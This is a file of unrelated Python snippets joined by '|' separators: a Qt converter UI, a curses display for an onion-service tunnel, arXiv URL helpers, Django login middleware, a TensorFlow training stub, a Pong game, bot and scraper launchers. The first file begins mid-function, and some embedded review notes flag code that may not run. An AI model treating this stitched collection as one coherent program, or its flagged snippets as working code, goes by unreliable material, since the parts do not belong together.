                         (self.comboBoxToLength_2, area_to_units),
                         (self.comboBoxFromVolume, volume_units),
                         (self.comboBoxToVolume, volume_units),
                         (self.comboBoxFromMass, mass_units),
                         (self.comboBoxToMass, mass_units),
                         (self.comboBoxFromDensity, density_units),
                         (self.comboBoxToDensity, density_units),
                         (self.comboBoxFromMassFlow, massflow_units),
                         (self.comboBoxToMassFlow, massflow_units)):
        for index, unit in enumerate(units):
            combo.setItemText(index, _tr(unit))
    self.btnConvert.setText(_tr("Calculate"))
    self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabUnitConversion), _tr("Conversions"))
    # Circles tab
    self.labelCircleTitle.setText(_tr("Calculate Circle Properties"))
    # Typo fix: previously "any singe field."
    self.labelInputCircle.setText(_tr("Required inputs: any single field."))
    self.labelDiameter.setText(_tr("Diameter"))
    self.txtCLS_Diamter.setText(_tr("0"))
    self.labelArea.setText(_tr("Area"))
    self.txtCLS_Area.setText(_tr("0"))
    self.labelCircumference.setText(_tr("Circumference"))
    self.txtCLS_Circumference.setText(_tr("0"))
    self.btnCircles.setText(_tr("Calculate"))
    self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabCircles), _tr("Circles"))
    # Taper tab
    self.labelTaperTitle.setText(_tr("Calculate Taper Properties"))
    self.labelTaperInput.setText(_tr("Required inputs: any 3 of 4 fields."))
    self.labelAngle.setText(_tr("Taper Angle"))
    self.labelDiameter1.setText(_tr("Diameter 1"))
    self.labelDiameter2.setText(_tr("Diameter 2"))
    self.labelLength.setText(_tr("Length"))
    for field in (self.txtTA_Angle, self.txtTA_Diameter1,
                  self.txtTA_Diameter2, self.txtTA_Length):
        field.setText(_tr("0"))
    self.btnTaper.setText(_tr("Calculate"))
    self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabTaper), _tr("Taper"))
    # Racetrack tab
    self.labelTitleRT.setText(_tr("Calculate Racetrack Properties"))
    self.labelInputRT.setText(_tr("Required inputs: 2 of 4 inputs. Y is mandatory."))
    self.labelRTx.setText(_tr("Racetrack X"))
    self.txtRTRK_x.setText(_tr("0"))
    self.labelRTy.setText(_tr("Racetrack Y"))
    self.txtRTRK_y.setText(_tr("0"))
    self.labelRTarea.setText(_tr("Area"))
    self.txtRTRK_csa.setText(_tr("0"))
    self.labelRTcircumference.setText(_tr("Circumference"))
    self.txtRTRK_cfm.setText(_tr("0"))
    self.LabelRTz.setText(_tr("Racetrack Z"))
    self.txtRTRK_z.setText(_tr("0"))
    self.btnRacetrack.setText(_tr("Calculate"))
    self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabRaceTrack), _tr("Racetrack"))
    # Ellipse tab
    self.labelTitleEllipse.setText(_tr("Calculate Ellipse Properties"))
    self.labelInputEllipse.setText(_tr("Required inputs: 2 of 3 available inputs."))
    self.labelSMajor.setText(_tr("Semimajor Dia"))
    self.labelSMinor.setText(_tr("Semiminor Dia"))
    self.labelEArea.setText(_tr("Area"))
    self.labelEcircumference.setText(_tr("Circumference"))
    for field in (self.txtEllipses_semimajor, self.txtEllipses_semiminor,
                  self.txtEllipses_csa, self.txtEllipses_circumference):
        field.setText(_tr("0"))
    self.btnEllipses.setText(_tr("Calculate"))
    self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabEllipse), _tr("Ellipse"))
    # Rectangle tab
    self.label_5.setText(_tr("Calculate Rectangle Properties"))
    self.label_6.setText(_tr("Requires inputs for X and Y. R can be 0 or have a value."))
    self.label_10.setText(_tr("Circumference"))
    self.label_8.setText(_tr("Y"))
    self.label_9.setText(_tr("R"))
    self.label_7.setText(_tr("X"))
    for field in (self.txtRectangleR, self.txtRectangleCfm,
                  self.txtRectangleY, self.txtRectangleX,
                  self.txtRectangleArea):
        field.setText(_tr("0"))
    self.label_11.setText(_tr("Area"))
    self.btnRectangle.setText(_tr("Calculate"))
    self.btnConversions.setTabText(self.btnConversions.indexOf(self.tab), _tr("Rectangles"))
    # Menus and actions
    self.menuFile.setTitle(_tr("File"))
    self.menuExit.setTitle(_tr("Help"))
    self.actionExit.setText(_tr("Exit"))
    self.actionAbout.setText(_tr("About"))
|
# Copyright (c) 2016, Ethan White
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
import curses
import time
import math
import signal
import qrutil
import displayutil as util
from collections import OrderedDict
def draw_title(addr, localport, remoteport, window):
    """Render the highlighted, centered title bar on row 0."""
    remote = "%s:%s" % (addr, remoteport)
    local = "localhost:" + str(localport)
    title = "Tunneling \xb2%s\xb2 to \xb2%s\xb2" % (remote, local)
    padded = util.center_pad_text(title, window.width)
    window.draw_fancy_text(padded, 0, 0, curses.color_pair(1))
def draw_kv(kv, window):
    """Draw key/value pairs as aligned rows starting at row 2, column 1.

    Keys are right-padded to the width of the longest key so the values
    line up; values are wrapped in \\xb2 markers for fancy rendering.

    Fixes a crash on an empty mapping (``max()`` of an empty sequence)
    and drops the intermediate padded-key OrderedDict.
    """
    if not kv:
        return  # Nothing to draw; the old code raised ValueError here.
    width = max(len(key) for key in kv)
    for row, (key, value) in enumerate(kv.items()):
        window.draw_fancy_text("%s \xb2%s\xb2" % (key.ljust(width), value),
                               row + 2, 1)
def draw_qr(data, window):
    """Draw the QR code for `data` anchored to the bottom-right corner."""
    try:
        # The QR code is regenerated on every frame; fine at ~1 Hz, but a
        # candidate for caching if profiling ever shows it matters.
        rendered = qrutil.QRWrapper(data).compact_repr().split("\n")
        for offset, line in enumerate(rendered):
            row = window.height - len(rendered) + offset
            col = window.width - len(line)
            window.draw_text(line, col, row)
    except curses.error:
        # Writing into the last cell of the screen can raise in curses;
        # skip the QR code for this frame rather than crash.
        pass
def draw(tunnel, window):
    """Redraw the entire status screen for `tunnel` on `window`."""
    window.update_size()
    window.window.clear()
    draw_title(tunnel.addr, tunnel.localport, tunnel.remoteport, window)
    info = OrderedDict()
    if tunnel.is_file_tunnel:
        info["Exposed file"] = tunnel.exposed_file
    else:
        info["Local port"] = str(tunnel.localport)
    info["Remote host"] = "%s:%s" % (tunnel.addr, tunnel.remoteport)
    info["Remote HTTP URL"] = "http://%s:%s" % (tunnel.addr, tunnel.remoteport)
    status_labels = {
        "startup": "Startup (unavailable)",
        "running": "Available",
        "down": "Error (unavailable)",
    }
    info["Status"] = status_labels[tunnel.status]
    # Pick the largest sensible unit for the uptime display.
    uptime = tunnel.uptime
    if uptime < 60:
        info["Uptime"] = "%s second(s)" % math.floor(uptime)
    elif uptime < 60 * 60:
        info["Uptime"] = "%s minute(s)" % math.floor(uptime / 60)
    elif uptime < 60 * 60 * 24:
        info["Uptime"] = "%s hour(s)" % math.floor(uptime / (60 * 60))
    else:
        info["Uptime"] = "%s day(s)" % math.floor(uptime / (60 * 60 * 24))
    draw_kv(info, window)
    draw_qr("%s:%s" % (tunnel.addr, tunnel.remoteport), window)
    window.refresh()
def display_tunnel(tunnel):
    """Run the curses status UI for `tunnel` until the user hits Ctrl-C."""
    window = util.WindowWrapper()
    window.init()
    def redraw(_signum=None, _frame=None):
        # Extra parameters let this double as a signal handler.
        draw(tunnel, window)
    redraw()
    try:
        while True:
            time.sleep(1)
            redraw()
    except KeyboardInterrupt:
        window.teardown()
        print("Thanks for using onion-expose!")
if __name__ == "__main__":
    # Standalone demo: renders the UI against a fake tunnel so the layout
    # can be eyeballed without a real onion service.
    starttime = time.time()
    class DummyTunnel:
        """Static stand-in for a real tunnel object.

        NOTE(review): this defines neither ``is_file_tunnel`` nor ``status``
        (``__getattr__`` raises AttributeError for anything but ``active``),
        yet draw() reads both — verify the demo still runs.
        """
        def __init__(self):
            self.addr = "facebookcorewwwi.onion"
            self.localport = 8004
            self.remoteport = 80
            self.first_active = 0
        def get_uptime(self):
            # Uptime is measured from module import, not object creation.
            return time.time() - starttime
        uptime = property(get_uptime)
        def __getattr__(self, key):
            # Pretend the tunnel comes up five seconds after start.
            if key == "active":
                return time.time() - starttime > 5
            raise AttributeError
    window = util.WindowWrapper()
    tunnel = DummyTunnel()
    window.init()
    def redraw(arg1=None, arg2=None):
        # Extra parameters allow use as a signal handler (signum, frame).
        draw(tunnel, window)
    redraw()
    try:
        while True:
            # This is actually only one of two update loops.
            # The other redraws information about the hidden service;
            # it's much more periodic.
            time.sleep(1)
            redraw()
    except KeyboardInterrupt:
        window.teardown()
        print("Thanks for using onion-expose!")
|
"""
Helpers for working with URLs in arXiv Flask applications.
This module provides :func:`external_url_handler`, which is attached to Flask
application instances by :class:`arxiv.base.Base`. This leverages Flask's
built-in hook for :class:`flask.BuildError` exception handlers, described in
the :func:`flask.url_for` documentation.
To set a URL for an external (i.e. not provided by this application) endpoint,
define a variable called ``URLS`` in your application configuration. ``URLS``
should be a list of three-tuples, of the form (``endpoint (str)``,
``path (str)``, ``domain (str)``). Paths should use the `Werkzeug rule format
<http://werkzeug.pocoo.org/docs/0.14/routing/#rule-format>`_. For example:
.. code-block:: python
URLS = [
("pdf", "/pdf/<arxiv:paper_id>", "arxiv.org"),
("twitter", "/arxiv", "twitter.com"),
("blog", "/arxiv", "blogs.cornell.edu")
]
You can load these urls using :func:`flask.url_for`. For example,
``url_for("pdf", paper_id="1601.00123")`` should return
``https://arxiv.org/pdf/1601.00123``.
Using environment variables
---------------------------
An alternative approach is to set the endpoint using an environment variable.
Setting ``ARXIV_FOO_URL`` will define a rule for endpoint ``foo`` using the
domain and path parsed from the variable's value. For example:
.. code-block:: python
os.environ['ARXIV_BLOG_URL'] = 'http://blogs.cornell.edu/arxiv'
Caveats
-------
URLs can be defined in :mod:`arxiv.base.config`, in environment variables,
and in the configuration of a :class:`flask.Flask` application that uses
:class:`arxiv.base.Base`. Preference is given to each of those respective
sources with increasing priority.
This will build URLs with the ``https`` scheme by default. To use ``http``,
set ``EXTERNAL_URL_SCHEME = 'http'`` in your configuration.
Danger! Memory leaks lurk here
------------------------------
Earlier versions of this module built Werkzeug routing machinery (Rules, Maps,
etc) on the fly. This led to serious memory leaks. As of v0.15.6,
:class:`.Base` uses :func:`register_external_urls` to set up external URL
handling, which registers a single :class:`.MapAdapter` on a Flask app. This
adapter is in turn used by :func:`external_url_handler` on demand.
See ARXIVNG-2085.
"""
import sys
from typing import Dict, Any, List
from urllib.parse import parse_qs
from werkzeug.urls import url_encode, url_parse, url_unparse
from werkzeug.routing import Map, Rule, BuildError, MapAdapter
from flask import current_app, g, Flask
from arxiv.base.exceptions import ConfigurationError
from arxiv.base.converter import ArXivConverter
from arxiv.base import logging
from arxiv.base import config as base_config
from .clickthrough import clickthrough_url
from .links import urlize, urlizer, url_for_doi
logger = logging.getLogger(__name__)
def build_adapter(app: Flask) -> MapAdapter:
    """Build a :class:`.MapAdapter` from configured URLs.

    Base URLs from :mod:`arxiv.base.config` are overlaid with any ``URLS``
    defined on ``app.config``; application settings take precedence.
    """
    urls = {spec[0]: spec for spec in base_config.URLS}
    for spec in app.config.get('URLS', []):
        urls[spec[0]] = spec
    rules = [
        Rule(path, endpoint=name, host=host, build_only=True)
        for name, path, host in urls.values()
    ]
    url_map = Map(rules, converters={'arxiv': ArXivConverter},
                  host_matching=True)
    base_host = app.config.get('BASE_SERVER', 'arxiv.org')
    scheme = app.config.get('EXTERNAL_URL_SCHEME', 'https')
    adapter: MapAdapter = url_map.bind(base_host, url_scheme=scheme)
    return adapter
def external_url_handler(err: BuildError, endpoint: str, values: Dict) -> str:
    """
    Attempt to handle failed URL building with the registered adapter.

    This gets attached to a Flask application via the
    :func:`flask.Flask.url_build_error_handlers` hook.

    Fix: the previous ``values.pop('_external')`` raised ``KeyError`` when
    the caller did not supply the ``_external`` flag; a default makes the
    pop unconditional (the adapter forces external URLs anyway).
    """
    values.pop('_external', None)
    try:
        url: str = current_app.external_url_adapter.build(endpoint,
                                                          values=values,
                                                          force_external=True)
    except BuildError:
        # Re-raise the original BuildError, in context of original traceback.
        exc_type, exc_value, tb = sys.exc_info()
        if exc_value is err:
            raise exc_type(exc_value).with_traceback(tb)  # type: ignore
        else:
            raise err
    return url
def canonical_url(id: str, version: int = 0) -> str:
    """
    Generate the canonical URL for an arXiv identifier.

    This can be done from just the ID because the category is only needed
    when it is already part of the ID; ``id`` may be id, idv, cat/id, or
    cat/idv.  A nonzero ``version`` appends a ``v<version>`` suffix.

    TODO: the scheme/host/"/abs" pieces arguably belong in shared config
    (e.g. an INTERNAL_URL_SCHEME and arxiv.base.canonical).
    """
    scheme = current_app.config.get('EXTERNAL_URL_SCHEME', 'https')
    host = current_app.config.get('MAIN_SERVER', 'arxiv.org')
    suffix = f'v{version}' if version else ''
    return f'{scheme}://{host}/abs/{id}{suffix}'
def register_external_urls(app: Flask) -> None:
    """Register :func:`external_url_handler` on a Flask app.

    Builds the external-URL :class:`.MapAdapter` exactly once and stores it
    on the app (see the module docstring: building routing machinery per
    request leaked memory, ARXIVNG-2085).
    """
    app.external_url_adapter = build_adapter(app)
    app.url_build_error_handlers.append(external_url_handler)
|
"""
Entradas
Lectura de la factura-->float-->L
Costo kilovatio-->float-->CK
Salidas
Monto total de la factura-->float-->MT
"""
L=float(input("Ingrese la lectura de su factura: "))
CK=float(input("ingrese el costo del kilovatio: "))
MT=(L*CK)
print("Monto total de su factura: "+str(MT))
|
import numpy as np
from grad_check import test_gradient
import deepart
def gen_test_target_data(net, targets):
    """Produce synthetic per-target activation data for gradient checking.

    For each entry in `targets`, feeds Gaussian noise through `net` and
    records the rectified activations of each named blob, optionally
    reduced to a Gram matrix.  Returns one dict per target, keyed by blob
    name.

    NOTE(review): assumes each `targets` entry is a 4-tuple of
    (image_path, blob_names, is_gram, _) — confirm against deepart's
    callers.
    """
    input_shape = deepart.get_data_blob(net).data.shape
    target_data_list = []
    for target_i, (target_img_path, target_blob_names, is_gram, _) in enumerate(targets):
        # Copy image into input blob
        # (random noise stands in for a real image during gradient checks;
        # target_img_path is deliberately unused here)
        target_data = np.random.normal(size=input_shape)
        deepart.get_data_blob(net).data[...] = target_data
        net.forward()
        target_datas = {}
        for target_blob_name in target_blob_names:
            # Copy so later forward passes don't clobber the recorded data.
            target_data = net.blobs[target_blob_name].data.copy()
            # Apply ReLU
            pos_mask = target_data > 0
            target_data[~pos_mask] = 0
            if is_gram:
                target_datas[target_blob_name] = deepart.comp_gram(target_data)
            else:
                target_datas[target_blob_name] = target_data
        target_data_list.append(target_datas)
    return target_data_list
def test_all_gradients(init_img, net, all_target_blob_names, targets, target_data_list):
    """Gradient-check deepart's content, style, and overall objective.

    NOTE(review): the `target_data_list` parameter is never used — it is
    overwritten by gen_test_target_data() below before the final check.
    Consider dropping the parameter or honoring the caller's value.
    """
    # Set initial value and reshape net
    deepart.set_data(net, init_img)
    x0 = np.ravel(init_img).astype(np.float64)
    dx = 1e-2  # finite-difference step size
    grad_err_thres = 1e-3  # maximum tolerated gradient error
    test_count = 100  # number of random coordinates probed per check
    # Hard-coded probe shape, independent of init_img — presumably chosen
    # small to keep the finite-difference checks fast; TODO confirm.
    input_shape = (1, 30, 40, 50)
    target_data = np.random.normal(size=input_shape)
    test_gradient(
        deepart.content_grad, input_shape, dx, grad_err_thres, test_count,
        target_data
    )
    # Gram matrix for the shape above is (channels, channels) = (30, 30).
    target_data_gram = np.random.normal(size=(30, 30))
    test_gradient(
        deepart.style_grad, input_shape, dx, grad_err_thres, test_count,
        target_data_gram
    )
    target_data_list = gen_test_target_data(net, targets)
    test_gradient(
        deepart.objective_func, x0.shape, dx, grad_err_thres, test_count,
        net, all_target_blob_names, targets, target_data_list
    )
|
from django.shortcuts import redirect
# In Django, middleware is a lightweight plugin that runs during request and response processing. Middleware is used to add a cross-cutting function to the application, such as security, sessions, CSRF protection, or authentication. Django ships several built-in middleware classes (see the MIDDLEWARE setting in the project's 'settings.py'; for example, SecurityMiddleware hardens the application) and also lets us write our own. In this app we created our own middleware to check whether the user has a session: a session means the user is logged in; without one, no one is logged in.
# Django initializes a middleware factory like auth_middleware exactly once, passing it 'get_response'. The returned function then handles one request at a time: it takes the request and sends back the response after checking the login constraint. The views it protects are wired up via get() calls in cart.py, order.py and pdf.py, all routed through 'urls.py'.
def auth_middleware(get_response):
    """Middleware factory that forces login before a wrapped view runs.

    Django calls this once with ``get_response``; the returned ``middleware``
    closure then runs per request.  An anonymous user is redirected to the
    login page with a ``return_url`` query parameter so the login view can
    bounce them back to where they were headed.
    """
    # One-time configuration and initialization happens here (none needed).
    def middleware(request):
        # 'PATH_INFO' holds just the path portion of the request, which
        # stays valid regardless of where the app is mounted — unlike the
        # full URL, it is portable across servers and URL prefixes.
        return_url = request.META['PATH_INFO']
        # The 'customer' session key is only set after a successful login;
        # sessions are Django's per-browser state store.
        print(request.session.get('customer'))
        if not request.session.get('customer'):
            return redirect(f'login?return_url={return_url}')
        return get_response(request)
    return middleware
|
import model3 as M
import tensorflow as tf
import numpy as np
import network
import datareader
# Global batch size; the loss in loss_func() is normalized by this value.
BSIZE = 128*4
# Number of training epochs (consumed by the commented-out loop below).
EPOCH = 30
# data_reader = datareader.DataReader('imglist_iccv.txt', BSIZE)
# Run all Keras layers in training mode (affects dropout/batch-norm).
tf.keras.backend.set_learning_phase(True)
def loss_func(out, label):
    """Softmax cross-entropy between logits `out` and one-hot `label`,
    summed over the batch and divided by the global batch size BSIZE."""
    target = tf.convert_to_tensor(label)
    log_probs = tf.nn.log_softmax(out, -1)
    per_sample = tf.reduce_sum(-log_probs * target, -1)
    return tf.reduce_sum(per_sample) / BSIZE
def grad_loss(x, model):
    """One forward/backward pass.

    Returns (gradients, [loss, accuracy]) for the (data, label) pair `x`.

    Fix: ``tf.gradient_tape`` does not exist in the TensorFlow API and
    raised AttributeError at runtime; the context manager is
    ``tf.GradientTape``.
    """
    data, label = x
    with tf.GradientTape() as tape:
        out = model(data, label)
        loss = loss_func(out, label)
        acc = M.accuracy(out, label, one_hot=False)
    grads = tape.gradient(loss, model.trainable_variables)
    return grads, [loss, acc]
def lr_decay(step):
    """Step-decay schedule: lr = 0.1 * 0.1 ** floor(step / 20000).

    i.e. the learning rate starts at 0.1 and shrinks tenfold every
    20000 steps.  Uses tf ops so `step` may be a tensor.
    """
    base_lr = 0.1
    decade = tf.math.floor(step / 20000)
    return base_lr * tf.math.pow(0.1, decade)
# Smoke test: build a small FaceRecogNet (512-dim embedding, 100 classes),
# run one dummy forward pass so all variables get created, then list the
# trainable variable names.  The real training loop is commented out below.
model = network.FaceRecogNet(512,100)
_ = model(np.float32(np.ones([1,128,128,3])), np.float32(np.eye(100)[0]))
vs = model.trainable_variables
for v in vs:
    print(v.name)
# t0 = time.time()
# LR = M.LRScheduler(lr_decay)
# print('Label number:', data_reader.max_label+1)
# model = network.FaceRecogNet(512, data_reader.max_label + 1)
# optimizer = tf.optimizers.SGD(LR, 0.9)
# saver = M.Saver(model)
# # saver.restore('./model/')
# _ = model(np.float32(np.ones([1,112,112,3])), np.float32(np.eye(data_reader.max_label+1)[0]))
# accmeter = M.EMAMeter(0.9)
# lossmeter = M.EMAMeter(0.9)
# lsttlmeter = M.EMAMeter(0.9)
# for ep in range(EPOCH):
# for it in range(data_reader.iter_per_epoch):
# batch = data_reader.get_next()
# grad, lsacc = grad_loss(batch, model)
# optimizer.apply_gradients(zip(grad, model.trainable_variables))
# if it%10==0:
# t1 = time.time()
# img_sec = 10 * BSIZE / (t1-t0)
# lsttl = lsacc[0]
# ls = lsacc[1]
# acc = lsacc[2]
# lsttl = lsttlmeter.update(lsttl.numpy())
# ls = lossmeter.update(ls.numpy())
# acc = accmeter.update(acc.numpy())
# t0 = t1
# print('Epoch:%d\tIter:%d\tLoss0:%.6f\tLoss:%.6f\tAcc:%.6f\tSpeed:%.2f'%(ep, it, lsttl, ls, acc, img_sec))
# if it%5000==0 and it>0:
# saver.save('./model/%d_%d.ckpt'%(ep,it))
# t0 = time.time()
# saver.save('./model/%d_%d.ckpt'%(ep,it))
|
"""Implementation of classic arcade game Pong."""
LINK = "http://www.codeskulptor.org/#user47_2HxT8SEaWe_8.py"
import simplegui
import random
# Constants
WIDTH = 600        # canvas width, pixels
HEIGHT = 400       # canvas height, pixels
BALL_RADIUS = 20   # ball radius, pixels
PAD_WIDTH = 8      # paddle thickness, pixels
PAD_LENGTH = 80    # paddle height, pixels
PAD_VEL = 4        # paddle speed, pixels per tick
# helper functions
def add_vec(first_vector, second_vector, dimensions=2, wrap_frame=False):
    """Component-wise sum of two vectors.

    With wrap_frame=True each component wraps modulo the global FRAME_SIZE
    (toroidal arithmetic).  NOTE(review): FRAME_SIZE is not defined in this
    module's visible scope — confirm it exists before using wrap_frame.
    """
    total = []
    for axis in range(dimensions):
        component = first_vector[axis] + second_vector[axis]
        if wrap_frame:
            component %= FRAME_SIZE[axis]
        total.append(component)
    return total
def scale_vec(vec, scale=0.1, dimensions=2):
    """Return `vec` multiplied by the scalar `scale` (first `dimensions`
    components only)."""
    return [vec[axis] * scale for axis in range(dimensions)]
def process_group(object_lst, canvas):
    """Draw each object in the list, then advance its state one tick.

    Fix: the loop variable was named ``object``, shadowing the builtin.
    """
    for item in object_lst:
        item.draw(canvas)
        item.update()
# classes
class Ball:
    """A moving circle.  Position and velocity are 2-element [x, y] lists."""
    def __init__(self, pos, vel, radius):
        # Copy the sequences so callers' lists are never aliased.
        self.pos = list(pos)
        self.vel = list(vel)
        self.radius = radius
    def __str__(self):
        return "Ball pos " + str(self.pos) + ". Ball vel " + str(self.vel)
    def get_position(self):
        """Current [x, y] center of the ball."""
        return self.pos
    def get_radius(self):
        """Radius of the ball."""
        return self.radius
    def reflect(self, direction):
        """Bounce the ball: negate x-velocity for "horizontal",
        y-velocity for "vertical"; any other value is ignored."""
        if direction == "horizontal":
            self.vel[0] = -self.vel[0]
        elif direction == "vertical":
            self.vel[1] = -self.vel[1]
    def accelerate(self):
        """Speed the ball up by 10% (called on a paddle hit)."""
        self.vel = scale_vec(self.vel, scale=1.1)
    def update(self):
        """Advance the ball one tick along its velocity."""
        self.pos = add_vec(self.pos, self.vel)
    def draw(self, canvas):
        """Render the ball as a filled white circle."""
        canvas.draw_circle(self.pos, self.radius, 1, "White", "White")
class Paddle:
    """An axis-aligned paddle; `pos` is its top-left corner."""
    def __init__(self, pos, width, length):
        self.pos = pos
        self.width = width
        self.length = length
        self.vel = [0, 0]  # Only the vertical component is ever nonzero.
    def __str__(self):
        return "Paddle pos " + str(self.pos) + ". Paddle vel " + str(self.vel)
    def is_collide(self, pos, radius):
        """True when a ball centered at `pos` overlaps the paddle's
        vertical span, with a half-radius tolerance beyond either edge.

        Only the vertical extent is tested; the caller is expected to have
        already established that the ball is at this paddle's gutter.
        """
        top = self.pos[1] - radius / 2
        bottom = self.pos[1] + self.length + radius / 2
        return top < pos[1] < bottom
    def update(self):
        """Slide along the gutter, clamped so the paddle stays on screen."""
        candidate = add_vec(self.pos, self.vel)
        if 0 <= candidate[1] <= HEIGHT - PAD_LENGTH:
            self.pos = candidate
    def set_vel(self, vertical_vel):
        """Set the paddle's vertical velocity."""
        self.vel[1] = vertical_vel
    def draw(self, canvas):
        """Render the paddle as a filled white rectangle."""
        x, y = self.pos[0], self.pos[1]
        corners = [self.pos,
                   [x + self.width, y],
                   [x + self.width, y + self.length],
                   [x, y + self.length]]
        canvas.draw_polygon(corners, 1, "White", "White")
class GameState:
    """ Holds the scores and (re)creates the ball and both paddles """
    def __init__(self):
        self.score_1 = 0
        self.score_2 = 0
        self.spawn_ball(random.choice(["Right", "Left"]))
        self.create_paddles()
    def get_score(self, num):
        """ Returns player num's score as a string """
        if num == 1:
            return str(self.score_1)
        if num == 2:
            return str(self.score_2)
    def increment_score(self, num):
        """ Adds one point to player num """
        if num == 1:
            self.score_1 += 1
        if num == 2:
            self.score_2 += 1
    def spawn_ball(self, direction):
        """ Replaces the global ball with a fresh one heading in direction """
        global ball
        # keep the two RNG draws in this exact order
        x_vel = random.randrange(2, 4)
        y_vel = random.choice([-1, 1]) * random.randrange(1, 3)
        if direction == "Left":
            x_vel = - x_vel
        ball = Ball([WIDTH / 2, HEIGHT / 2], [x_vel, y_vel], BALL_RADIUS)
    def create_paddles(self):
        """ Creates the left and right paddles at mid-height """
        global paddle_1, paddle_2
        mid_y = HEIGHT / 2 - PAD_LENGTH / 2
        paddle_1 = Paddle([0, mid_y], PAD_WIDTH, PAD_LENGTH)
        paddle_2 = Paddle([WIDTH - PAD_WIDTH, mid_y], PAD_WIDTH, PAD_LENGTH)
# event handlers
def keydown(key):
    """ Keydown handler: start moving the paddle mapped to the pressed key """
    for move, (paddle, vel) in move_dict.items():
        if key == simplegui.KEY_MAP[move]:
            paddle.set_vel(vel)
def keyup(key):
    """ Keyup handler: stop the paddle mapped to the released key """
    for move, (paddle, _vel) in move_dict.items():
        if key == simplegui.KEY_MAP[move]:
            paddle.set_vel(0)
def draw(canvas):
    """ Draws the ball, paddles, and field; also runs the per-frame physics """
    pos = ball.get_position()
    radius = ball.get_radius()
    # bounce off the top/bottom walls, or handle the left/right gutters
    if pos[1] <= radius or pos[1] >= HEIGHT - radius:
        ball.reflect("vertical")
    elif pos[0] <= radius + PAD_WIDTH:
        # left gutter: bounce off paddle 1, otherwise player 2 scores
        if paddle_1.is_collide(pos, radius):
            ball.reflect("horizontal")
            ball.accelerate()
        else:
            game.increment_score(2)
            game.spawn_ball("Right")
    elif pos[0] >= WIDTH - radius - PAD_WIDTH:
        # right gutter: bounce off paddle 2, otherwise player 1 scores
        if paddle_2.is_collide(pos, radius):
            ball.reflect("horizontal")
            ball.accelerate()
        else:
            game.increment_score(1)
            game.spawn_ball("Left")
    # drawing and updating ball and paddles
    process_group([ball, paddle_1, paddle_2], canvas)
    # drawing mid line, gutters and scores
    canvas.draw_line([WIDTH / 2, 0], [WIDTH / 2, HEIGHT], 1, "White")
    canvas.draw_line([PAD_WIDTH, 0], [PAD_WIDTH, HEIGHT], 1, "White")
    canvas.draw_line([WIDTH - PAD_WIDTH, 0], [WIDTH - PAD_WIDTH, HEIGHT], 1, "White")
    canvas.draw_text("Player 1: " + game.get_score(1), (25, 25), 36, "White")
    canvas.draw_text("Player 2: " + game.get_score(2), (400, 25), 36, "White")
# starting the game
frame = simplegui.create_frame("Pong", WIDTH, HEIGHT)
frame.set_draw_handler(draw)
frame.set_keydown_handler(keydown)
frame.set_keyup_handler(keyup)
# GameState() must run before move_dict is built: create_paddles()
# assigns the global paddle_1/paddle_2 referenced just below
game = GameState()
# key name -> [paddle to move, vertical velocity to apply on keydown]
move_dict = {"w" : [paddle_1, - PAD_VEL],
             "s" : [paddle_1, PAD_VEL],
             "up" : [paddle_2, - PAD_VEL],
             "down" : [paddle_2, PAD_VEL]}
frame.start()
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
# Copyright 2021 zhangt2333. All Rights Reserved.
# Author-Github: github.com/zhangt2333
# main.py 2021/9/13 14:00
import spider
# login credentials; the placeholder strings are Chinese for
# "account" and "unified-authentication password" — fill in before running
username = "账号"
password = "统一认证密码"
# delay (seconds) passed to the spider between operations
sleep_time = 1.0
if __name__ == '__main__':
    spider.main(username, password, sleep_time)
|
import logging
from telegram import ParseMode
from telegram.ext import ExtBot
from telegram.ext import Defaults
from telegram.utils.request import Request
from bot import database
from bot.bot import StickerBot
from bot.utils import log
from config import config as CONFIG
logger = logging.getLogger(__name__)
# single module-level bot instance; Defaults applies HTML parse mode and
# disabled link previews to every outgoing message
stickerbot = StickerBot(
    bot=ExtBot(
        token=CONFIG.TELEGRAM.TOKEN,
        defaults=Defaults(parse_mode=ParseMode.HTML, disable_web_page_preview=True),
        request=Request(con_pool_size=8)  # 8 connections in the HTTP pool
    ),
    use_context=True
)
def main():
    """Configure logging from logging.json and start the bot,
    discarding updates that queued up while it was offline."""
    log.load_logging_config('logging.json')
    stickerbot.run(drop_pending_updates=True)
|
import plotly.express as px
import pandas as pd
import datetime
class SolutionVisualizer:
    """Print and plot operating-room scheduling solutions.

    A solution maps (operating_room_index, day_index) -> list of patients,
    with both indices 1-based, or is None when no solution was found.
    """

    def __init__(self):
        pass

    def print_solution(self, solution):
        """Print every scheduled patient, grouped by day and operating room."""
        if solution is None:
            print("No solution was found!")
            return
        # the lexicographic max of the (k, t) keys yields the largest indices
        K, T = max(solution.keys())
        operated_patients = 0
        for t in range(1, T + 1):
            for k in range(1, K + 1):
                print("Day: " + str(t) + "; Operating Room: S" + str(k) + "\n")
                for patient in solution[(k, t)]:
                    print(patient)
                    operated_patients += 1
